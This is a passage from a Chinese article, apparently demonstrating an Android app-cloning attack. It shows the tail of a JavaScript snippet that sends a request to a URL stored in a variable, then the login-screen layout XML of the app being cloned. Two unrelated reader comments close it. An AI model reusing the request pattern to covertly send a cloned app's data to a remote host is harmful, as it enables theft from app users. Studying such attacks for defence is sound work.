}
xmlhttp2.onreadystatechange=function()
{
if (xmlhttp2.readyState==4)
{
//document.write(xmlhttp2.status);
//document.write(arm);
}
}
xmlhttp2.open("GET",arm);
xmlhttp2.send(null);
}
loadXMLDoc();
</script>
</html>
3、AppClone

被克隆的APP,mainactivity用于登录,successactivity显示登录成功后的个人页面。
Code区域:
mainactivity
<?xml version="1.0"encoding="utf-8"?>
<LinearLayoutxmlns:android=" "
xmlns:tools=" "
android:id="@+id/ll1"
android:layout_width="fill_parent"
android:layout_height="fill_parent"
android:orientation="vertical" >
<TextView android:text="用户名"
android:layout_width="match_parent"
android:layout_height="wrap_content"/>
<EditText android:id="@+id/username"
android:layout_width="match_parent"
android:layout_height="wrap_content"/>
<TextView android:text="密码"
android:layout_width="match_parent"
android:layout_height="wrap_content"/>
<EditText android:id="@+id/password"
android:layout_width="match_parent"
android:layout_height="wrap_content"/>
<Button android:id="@+id/button"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:text="登录"/>
<ScrollView android:id="@+id/scrollView1"
android:layout_width="match_parent"
android:layout_height="wrap_content"
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/shouji/article-85138-2.html
趁机利用战争削弱美日
是不是山寨出来的